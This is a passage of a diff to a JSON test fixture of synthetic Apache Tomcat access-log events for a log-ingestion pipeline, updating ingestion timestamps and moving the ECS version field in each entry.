Chrome/44.0.2403.147 Mobile Safari/537.36 YaApp_Android/10.90 YaSearchBrowser/10.90||emo", "event": { - "ingested": "2021-06-09T13:32:47.950571400Z" + "ingested": "2021-12-14T14:58:59.365406960Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-494-GET: 10.218.0.197||dolor||econs||[16/Nov/2017:6:08:15 ET]||eritin||https://www.example.net/yCic/nder.jpg?itanim=nesciun#saqu||iscive||quasiar||aeab||teur||609||https://www.example.org/mol/tur.jpg?usmodi=ree#saquaea||Mozilla/5.0 (Linux; Android 9; POCOPHONE F1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36||eetd", "event": { - "ingested": "2021-06-09T13:32:47.950581200Z" + "ingested": "2021-12-14T14:58:59.365407350Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "December 1 01:10:49 iatqu7310.api.home %APACHETOMCAT- get: 10.123.199.198||irured||illumqui||[01/Dec/2017:1:10:49 
PST]||tionula||https://mail.example.com/ecatcupi/uamei.html?nreprehe=onse#olorem||turvel||eratv||ipsa||asuntexp||1390||https://example.com/oremquel/lmole.jpg?boNem=iumt#tsed||Mozilla/5.0 (Linux; Android 10; ASUS_X01BDA) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.162 Mobile Safari/537.36||mpo", "event": { - "ingested": "2021-06-09T13:32:47.950587600Z" + "ingested": "2021-12-14T14:58:59.365407737Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "December 15 08:13:24 uamnihil6127.api.domain %APACHETOMCAT- POST: 10.29.119.245||tatnon||leumiur||[15/Dec/2017:8:13:24 ET]||ore||https://internal.example.net/ection/roquisqu.html?ceroinB=nim#utaliqu||rsi||taliqui||mides||ciun||39||https://example.org/iatqu/inBCSedu.gif?urExcep=ema#suntex||Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 YaBrowser/20.3.0.2221 Yowser/2.5 Safari/537.36||anim", "event": { - "ingested": "2021-06-09T13:32:47.950593300Z" + "ingested": "2021-12-14T14:58:59.365408466Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "December 29 15:15:58 uov1629.internal.invalid %APACHETOMCAT- DETECT_METHOD_TYPE: 10.130.175.17||quide||quaU||[29/Dec/2017:3:15:58 PT]||inimav||https://mail.example.net/iutali/itat.txt?Finibus=radi#xeacom||des||atnulapa||billo||rroqu||2170||https://www.example.org/taedi/tquido.html?etconsec=elillum#upt||Mozilla/5.0 (Linux; Android 9; U307AS) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36||onsectet", "event": { - "ingested": "2021-06-09T13:32:47.950599100Z" + "ingested": "2021-12-14T14:58:59.365408868Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-5752-PROPFIND: 10.166.90.130||mdolore||eosquira||[12/Jan/2018:10:18:32 
CET]||lloinven||https://mail.example.net/lmolesti/apariatu.htm?moe=msequ#uat||lupta||npr||etconsec||caboNem||1043||https://internal.example.org/litesseq/atcupida.html?tob=dolores#equamnih||Mozilla/5.0 (Linux; Android 8.1.0; SM-A260G Build/OPR6; rv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Rocket/2.1.17(19420) Chrome/81.0.4044.138 Mobile Safari/537.36||deF", "event": { - "ingested": "2021-06-09T13:32:47.950604400Z" + "ingested": "2021-12-14T14:58:59.365409343Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "January 27 05:21:06 orumw5960.www5.home %APACHETOMCAT- GET: 10.248.111.207||dolor||tiumto||[27/Jan/2018:5:21:06 GMT-07:00]||quiavol||https://api.example.org/ratv/alorum.jpg?tali=BCS#qui||ugiatquo||incidid||quin||autemv||6174||https://internal.example.org/mipsumqu/tatio.jpg?admi=onnu#olorema||Mozilla/5.0 (Linux; Android 9; G8142) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36||atatnon", "event": { - "ingested": "2021-06-09T13:32:47.950609500Z" + "ingested": "2021-12-14T14:58:59.365409726Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-2940-asdf: 10.185.37.32||ame||tesseq||[10/Feb/2018:12:23:41 GMT+02:00]||tem||https://internal.example.net/gitse/ugitse.jpg?tvolup=tdolore#ventore||red||sinto||tatev||luptas||3286||https://api.example.net/aev/inrepr.gif?iadese=nisiu#imad||Mozilla/5.0 (Linux; Android 9; ZTE Blade V1000RU Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36 YaApp_Android/10.91 YaSearchBrowser/10.91||ptatem", "event": { - "ingested": "2021-06-09T13:32:47.950614500Z" + "ingested": "2021-12-14T14:58:59.365410134Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-4927-SEARCH: 
10.5.194.202||onproide||ntmo||[24/Feb/2018:7:26:15 CET]||riosa||https://example.org/pisc/urEx.html?rautod=olest#eataev||atcupi||atem||qui||otamr||7278||https://internal.example.com/meaque/uid.htm?tion=tobeatae#maccusa||Mozilla/5.0 (Linux; Android 10; LM-V350) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36||iqua", "event": { - "ingested": "2021-06-09T13:32:47.950619600Z" + "ingested": "2021-12-14T14:58:59.365410526Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "March 11 02:28:49 deriti6952.mail.domain %APACHETOMCAT- PRONECT: 10.183.34.1||boree||isn||[11/Mar/2018:2:28:49 CEST]||der||https://www5.example.com/aconse/prehe.gif?diduntu=eiusmod#itation||veleum||piciatis||nes||lmolesti||1559||https://www.example.org/emaperia/Section.txt?iame=orroquis#aquio||Mozilla/5.0 (Linux; U; Android 4.0.3; es-us; GT-P3100 Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30||ntmoll", "event": { - "ingested": "2021-06-09T13:32:47.950624500Z" + "ingested": "2021-12-14T14:58:59.365410910Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-4472-CFYZ: 10.101.163.40||abor||nBCSe||[25/Mar/2018:9:31:24 CEST]||remips||https://mail.example.net/reetdolo/rationev.html?reetdol=uelauda#ema||odi||ptatems||runtmo||ore||3512||https://internal.example.com/undeom/emullamc.jpg?quaer=eetdo#tlab||Mozilla/5.0 (Linux; Android 4.1.2; Micromax P410i Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36||liq", "event": { - "ingested": "2021-06-09T13:32:47.950629800Z" + "ingested": "2021-12-14T14:58:59.365411299Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 8 16:33:58 nse3421.mail.localhost %APACHETOMCAT- uGET: 
10.216.188.152||oremi||ugitsedq||[08/Apr/2018:4:33:58 ET]||atDuis||https://www5.example.com/mUteni/quira.htm?ore=tation#loinve||tatevel||iumdolo||untu||ict||2699||https://internal.example.com/riosamni/icta.gif?umetMa=imadmin#iqui||Mozilla/5.0 (Linux; Android 8.1.0; SM-A260G Build/OPR6; rv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Rocket/2.1.17(19420) Chrome/81.0.4044.138 Mobile Safari/537.36||Nequepo", "event": { - "ingested": "2021-06-09T13:32:47.950634900Z" + "ingested": "2021-12-14T14:58:59.365411686Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-1033-nGET: 10.94.140.77||veniam||isnisiu||[22/Apr/2018:11:36:32 OMST]||dol||https://www5.example.org/setquas/minim.gif?tutlabor=reseosq#gna||isiutali||lumqu||onulamco||ons||5050||https://mail.example.net/unt/tass.html?tla=mquiad#CSe||Opera/9.80 (Series 60; Opera Mini/7.1.32444/174.101; U; ru) Presto/2.12.423 Version/12.16||psa", "event": { - "ingested": "2021-06-09T13:32:47.950639700Z" + "ingested": "2021-12-14T14:58:59.365412068Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-4133-PUT: 10.223.205.204||lor||ccaec||[07/May/2018:6:39:06 PST]||ommo||https://www.example.com/laudanti/umiurer.txt?rsitvolu=mnisi#usmo||iamea||imaveni||uiacon||iam||7526||https://mail.example.org/oin/itseddoe.html?citati=uamei#eursinto||Mozilla/5.0 (Linux; Android 8.1.0; SM-A260G Build/OPR6; rv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Rocket/2.1.17(19420) Chrome/81.0.4044.138 Mobile Safari/537.36||tutla", "event": { - "ingested": "2021-06-09T13:32:47.950644400Z" + "ingested": "2021-12-14T14:58:59.365412471Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "May 21 13:41:41 tautfug689.localdomain %APACHETOMCAT- PUT: 
10.85.137.156||atiset||serror||[21/May/2018:1:41:41 CEST]||isiut||https://mail.example.org/ici/nisiuta.jpg?itae=dtempo#atnula||ditautf||itametc||ori||uamqu||2804||https://example.com/quiac/sunt.gif?etdol=dolorsi#nturmag||Mozilla/5.0 (Linux; Android 9; LG-US998) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36||Except", "event": { - "ingested": "2021-06-09T13:32:47.950649300Z" + "ingested": "2021-12-14T14:58:59.365412865Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "June 4 20:44:15 totam6886.api.localhost %APACHETOMCAT- QUALYS: 10.12.54.142||trudex||liquam||[04/Jun/2018:8:44:15 PST]||lor||https://mail.example.com/eseruntm/lpaquiof.html?magnaal=uscip#umS||iciadese||riatur||oeni||dol||3000||https://www5.example.net/teturadi/ditau.gif?piscivel=hend#eacommo||Mozilla/5.0 (Linux; Android 9; LG-US998) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36||aer", "event": { - "ingested": "2021-06-09T13:32:47.950654400Z" + "ingested": "2021-12-14T14:58:59.365413257Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-3864-RNDMMTD: 10.158.6.52||dolorem||sed||[19/Jun/2018:3:46:49 OMST]||Nemoenim||https://example.net/labori/porai.gif?utali=sed#xeac||umdolors||lumdo||acom||eFini||4262||https://internal.example.org/uovol/prehend.html?eque=eufug#est||Mozilla/5.0 (Linux; U; Android 7.1.2; uz-uz; Redmi 4X Build/N2G47H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/71.0.3578.141 Mobile Safari/537.36 XiaoMi/MiuiBrowser/12.2.3-g||ntincul", "event": { - "ingested": "2021-06-09T13:32:47.950659700Z" + "ingested": "2021-12-14T14:58:59.365413635Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "July 3 10:49:23 tquo854.api.domain %APACHETOMCAT- MKCOL: 
10.195.160.182||ine||urerepre||[03/Jul/2018:10:49:23 CT]||itessequ||https://www5.example.org/orissu/fic.gif?ese=mmodoco#amni||atnul||umfugi||stquidol||Nemoenim||1325||https://example.com/tasnul/tuserr.jpg?amvo=tnul#expl||Mozilla/5.0 (Linux; Android 6.0; ZTE BLADE V7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36||isau", "event": { - "ingested": "2021-06-09T13:32:47.950664800Z" + "ingested": "2021-12-14T14:58:59.365414021Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-6084-CONNECT: 10.20.68.117||rQuisaut||quas||[17/Jul/2018:5:51:58 ET]||metco||https://mail.example.com/iuntNeq/eddoei.jpg?sseq=eriam#pernat||udan||archi||iutaliq||urQuis||1742||https://example.net/orum/Bonoru.txt?agnamal=quei#quio||Mozilla/5.0 (Linux; Android 6.0; ZTE BLADE V7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36||lamcola", "event": { - "ingested": "2021-06-09T13:32:47.950669500Z" + "ingested": "2021-12-14T14:58:59.365414413Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 1 00:54:32 venia6656.api.domain %APACHETOMCAT- CONNECT: 10.94.136.235||mmod||iti||[01/Aug/2018:12:54:32 PST]||amqu||https://www5.example.com/tanimid/onpr.gif?gelitse=oremqu#idex||radip||upta||tetura||rumet||6923||https://www5.example.org/lestia/nde.jpg?pisci=sunt#texplica||Mozilla/5.0 (Linux; Android 6.0; Lenovo A2016a40 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.106 Mobile Safari/537.36 YaApp_Android/10.30 YaSearchBrowser/10.30||ore", "event": { - "ingested": "2021-06-09T13:32:47.950674400Z" + "ingested": "2021-12-14T14:58:59.365414802Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 15 07:57:06 veniam1216.www5.invalid %APACHETOMCAT- NCIRCLE: 
10.152.11.26||expli||ugiat||[15/Aug/2018:7:57:06 GMT+02:00]||oinBCSed||https://www.example.net/ntorever/pisciv.gif?eritq=rehen#ipsamvol||elillum||veleumi||nsequatu||nula||2783||https://example.com/santi/ritati.gif?turadip=dip#idolo||Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) yahoo.adquality.lwd.desktop/1591143192-10||aco", "event": { - "ingested": "2021-06-09T13:32:47.950679300Z" + "ingested": "2021-12-14T14:58:59.365415189Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 29 14:59:40 runtm5729.invalid %APACHETOMCAT- PRONECT: 10.82.118.95||bore||ptate||[29/Aug/2018:2:59:40 GMT+02:00]||labo||https://www5.example.com/quu/xeac.htm?abor=oreverit#scip||Finibus||Utenimad||olupta||tau||5211||https://www5.example.com/itametco/vel.htm?rere=pta#nonn||Mozilla/5.0 (Linux; Android 9; 5024D_RU Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36 YaApp_Android/10.61 YaSearchBrowser/10.61||met", "event": { - "ingested": "2021-06-09T13:32:47.950684300Z" + "ingested": "2021-12-14T14:58:59.365415577Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-4322-id: 10.187.152.213||conse||ventor||[12/Sep/2018:10:02:15 CEST]||mag||https://www.example.net/mini/Loremip.html?tur=atnonpr#ita||amquaer||aqui||enby||lpa||3948||https://www5.example.net/iat/ffic.htm?cte=aparia#CSe||Mozilla/5.0 (Linux; Android 9; Notepad_K10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Safari/537.36||ugitsedq", "event": { - "ingested": "2021-06-09T13:32:47.950720800Z" + "ingested": "2021-12-14T14:58:59.365415965Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "September 27 05:04:49 pta6012.www.local %APACHETOMCAT- 
uGET: 10.98.71.45||destla||fugitse||[27/Sep/2018:5:04:49 GMT+02:00]||eirur||https://www.example.net/duntutla/lamco.txt?isci=Dui#reetdo||ever||civelits||eos||ipitlabo||5440||https://internal.example.net/nonn/hite.htm?ariatur=labo#sautei||Mozilla/5.0 (Linux; Android 4.1.2; Micromax P410i Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36||unt", "event": { - "ingested": "2021-06-09T13:32:47.950727600Z" + "ingested": "2021-12-14T14:58:59.365416355Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-5971-uGET: 10.86.123.33||ugia||meum||[11/Oct/2018:12:07:23 OMST]||doei||https://www5.example.net/tev/nre.html?occaeca=eturadip#ent||rumSecti||Utenima||olore||orumS||757||https://www5.example.org/eursint/orio.txt?iameaqu=aaliquaU#olu||Mozilla/5.0 (Linux; U; Android 7.1.2; uz-uz; Redmi 4X Build/N2G47H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/71.0.3578.141 Mobile Safari/537.36 XiaoMi/MiuiBrowser/12.2.3-g||yCiceroi", "event": { - "ingested": "2021-06-09T13:32:47.950733500Z" + "ingested": "2021-12-14T14:58:59.365416745Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-2852-FGET: 10.6.112.183||deom||oluptat||[25/Oct/2018:7:09:57 GMT-07:00]||eni||https://www5.example.net/uamnih/nseq.txt?uidolo=umdolore#dmi||tam||oremip||eufugi||dunt||6169||https://api.example.net/uidexeac/sequa.html?modoc=magnam#uinesc||Mozilla/5.0 (Linux; Android 10; LM-V350) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36||idatat", "event": { - "ingested": "2021-06-09T13:32:47.950739200Z" + "ingested": "2021-12-14T14:58:59.365417198Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "November 9 02:12:32 orsi2109.internal.home %APACHETOMCAT- 
LOCK: 10.227.156.143||sis||idolo||[09/Nov/2018:2:12:32 CEST]||tsedquia||https://example.net/umdolor/isiu.html?mmodi=snostr#eniamqu||inimav||tatevel||midestl||nci||6587||https://www5.example.org/nvolupt/meiusm.htm?aturv=ectetura#obeataev||Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) yahoo.adquality.lwd.desktop/1591143192-10||seq", "event": { - "ingested": "2021-06-09T13:32:47.950745Z" + "ingested": "2021-12-14T14:58:59.365417581Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "November 23 09:15:06 quaeabil2539.www5.lan %APACHETOMCAT- get: 10.124.129.248||iamqui||quide||[23/Nov/2018:9:15:06 CT]||cididun||https://example.org/ibusBo/untincu.jpg?lesti=sintocca#mipsumqu||eprehen||hilmole||sequ||sectetu||7182||https://example.net/dolor/lorumwri.htm?mquis=lab#uido||Mozilla/5.0 (Linux; Android 6.0; ZTE BLADE V7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36||mwrit", "event": { - "ingested": "2021-06-09T13:32:47.950750500Z" + "ingested": "2021-12-14T14:58:59.365417966Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "December 7 16:17:40 aal1598.mail.host %APACHETOMCAT- CONNECT: 10.173.125.112||quiavolu||upta||[07/Dec/2018:4:17:40 OMST]||umtota||https://www5.example.org/magnaa/sumquiad.gif?oluptate=Duisa#consequa||eaqueip||itaedict||olorema||rep||3380||https://www5.example.net/siarc/fdeFin.jpg?tobeata=nesciun#amcolab||Mozilla/5.0 (Linux; Android 8.0.0; VS996) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36||isnisiut", "event": { - "ingested": "2021-06-09T13:32:47.950755700Z" + "ingested": "2021-12-14T14:58:59.365418346Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-5227-GET: 
10.37.156.140||uisnos||olores||[21/Dec/2018:11:20:14 PST]||epo||https://www.example.org/evolup/rvelil.gif?eavolup=ipsumq#evit||tno||iss||taspe||lum||5911||https://api.example.net/eturad/tDuis.htm?enimadmi=tateveli#osa||Opera/9.80 (Series 60; Opera Mini/7.1.32444/174.101; U; ru) Presto/2.12.423 Version/12.16||idolorem", "event": { - "ingested": "2021-06-09T13:32:47.950762Z" + "ingested": "2021-12-14T14:58:59.365418864Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-5776-PRONECT: 10.121.225.135||ufugi||cin||[05/Jan/2019:6:22:49 ET]||byC||https://example.com/oremip/its.jpg?iavol=natuserr#ostrudex||nse||miurere||evit||uatu||2448||https://www5.example.org/uamestqu/mpor.jpg?hender=ptatemU#seq||Mozilla/5.0 (Linux; Android 9; 5024D_RU Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36 YaApp_Android/10.61 YaSearchBrowser/10.61||tnulapa", "event": { - "ingested": "2021-06-09T13:32:47.950767300Z" + "ingested": "2021-12-14T14:58:59.365419269Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-7708-DEBUG: 10.123.68.56||expl||olore||[19/Jan/2019:1:25:23 CEST]||dentsunt||https://www.example.org/animid/upta.jpg?onnumqua=quioff#iuntN||ipis||itautfu||nesci||tam||1206||https://mail.example.net/tetura/eeufug.txt?modt=iduntutl#rsitam||Mozilla/5.0 (Linux; Android 10; ASUS_X01BDA) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.162 Mobile Safari/537.36||ntor", "event": { - "ingested": "2021-06-09T13:32:47.950772500Z" + "ingested": "2021-12-14T14:58:59.365419646Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "February 2 20:27:57 oid218.api.invalid %APACHETOMCAT- RNDMMTD: 10.63.56.164||iquid||evo||[02/Feb/2019:8:27:57 
GMT-07:00]||avolu||https://api.example.net/itesse/expl.html?prehende=lup#tpers||orsitv||temseq||uisaute||uun||4638||https://mail.example.net/nemulla/asp.html?ncul=taliq#tautfugi||Mozilla/5.0 (Linux; Android 4.1.2; Micromax P410i Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36||umd", "event": { - "ingested": "2021-06-09T13:32:47.950778200Z" + "ingested": "2021-12-14T14:58:59.365420029Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "February 17 03:30:32 sectetur2674.www5.test %APACHETOMCAT- HEAD: 10.62.10.137||eeufugi||deomnisi||[17/Feb/2019:3:30:32 ET]||issus||https://example.net/deritinv/evelite.html?iav=odico#rsint||itl||ttenb||olor||quiav||6648||https://example.com/eumfu/lors.gif?upidata=ici#usant||Mozilla/5.0 (Linux; Android 10; SM-A305FN Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.96 Mobile Safari/537.36 YandexSearch/8.10 YandexSearchBrowser/8.10||con", "event": { - "ingested": "2021-06-09T13:32:47.950783600Z" + "ingested": "2021-12-14T14:58:59.365420406Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "March 3 10:33:06 sequatD4487.internal.localhost %APACHETOMCAT- INDEX: 10.89.154.115||oeiusmo||nimv||[03/Mar/2019:10:33:06 GMT+02:00]||tconse||https://example.org/tseddoei/teursint.htm?remagnaa=lamcolab#ceroinB||umqui||citation||temsequi||mquia||1119||https://api.example.net/iveli/conseq.htm?ercitat=taspe#yCiceroi||Mozilla/5.0 (Linux; Android 8.0.0; VS996) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36||cti", "event": { - "ingested": "2021-06-09T13:32:47.950788500Z" + "ingested": "2021-12-14T14:58:59.365420796Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": 
"%APACHETOMCAT-4758-TRACE: 10.122.252.130||tuser||mmo||[17/Mar/2019:5:35:40 PST]||tlaboru||https://www5.example.com/ciad/ugiatqu.gif?turveli=isciv#natus||boreet||luptasnu||ento||snostr||3904||https://api.example.org/xerc/Nequep.htm?ria=beat#rro||Mozilla/5.0 (Linux; Android 9; 5024D_RU Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36 YaApp_Android/10.61 YaSearchBrowser/10.61||uisau", "event": { - "ingested": "2021-06-09T13:32:47.950793900Z" + "ingested": "2021-12-14T14:58:59.365421192Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-2573-id: 10.195.152.53||ueporroq||ute||[01/Apr/2019:12:38:14 GMT-07:00]||tationu||https://api.example.com/olore/ntutlab.htm?ameaquei=gnama#esciun||tesse||olupta||isno||oluptas||5560||https://www.example.net/rinrepr/dutp.jpg?modo=uiavo#uisaut||mobmail android 2.1.3.3150||paq", "event": { - "ingested": "2021-06-09T13:32:47.950798900Z" + "ingested": "2021-12-14T14:58:59.365421576Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 15 07:40:49 nul5107.www5.domain %APACHETOMCAT- ABCD: 10.9.255.204||illoin||emUtenim||[15/Apr/2019:7:40:49 CT]||uid||https://mail.example.com/rvelil/adese.htm?incidi=aedictas#rumetMa||mexerci||urEx||ditaut||ctetur||3089||https://mail.example.com/oreeu/mea.jpg?tis=oluptat#emi||Mozilla/5.0 (Linux; Android 4.1.2; Micromax P410i Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36||iaeconse", "event": { - "ingested": "2021-06-09T13:32:47.950803900Z" + "ingested": "2021-12-14T14:58:59.365421968Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 29 14:43:23 nimadmin5630.localdomain %APACHETOMCAT- RNDMMTD: 
10.214.235.133||equ||nulapari||[29/Apr/2019:2:43:23 GMT-07:00]||tsunt||https://www.example.org/oremi/ectobeat.gif?oreeu=uasiarch#Malor||boriosa||cillumdo||ditau||moenimip||5930||https://internal.example.net/oreetd/lor.txt?etc=eturadip#nost||Mozilla/5.0 (Linux; Android 9; LG-US998) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36||evel", "event": { - "ingested": "2021-06-09T13:32:47.950809400Z" + "ingested": "2021-12-14T14:58:59.365422378Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "May 13 21:45:57 sequuntu3563.internal.test %APACHETOMCAT- TRACE: 10.5.134.204||apari||iarchit||[13/May/2019:9:45:57 PT]||orum||https://api.example.com/orsitam/tiset.jpg?ati=rauto#doloreeu||lors||eumfu||docons||tur||3197||https://api.example.org/uasi/maveniam.html?rspicia=pitl#imi||Mozilla/5.0 (Linux; Android 5.1.1; Android Build/LMY47V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36 YaApp_Android/9.80 YaSearchBrowser/9.80||taevit", "event": { - "ingested": "2021-06-09T13:32:47.950814200Z" + "ingested": "2021-12-14T14:58:59.365422765Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-6820-SEARCH: 10.144.111.42||sumquia||vento||[28/May/2019:4:48:31 CEST]||asnu||https://example.org/rep/mveni.txt?utpers=num#ctetura||quaerat||tDuisau||aturve||ptateve||7615||https://internal.example.com/tconsect/pariat.gif?etcon=ctobeat#isi||Mozilla/5.0 (Linux; Android 8.1.0; SM-A260G Build/OPR6; rv) AppleWebKit/537.36 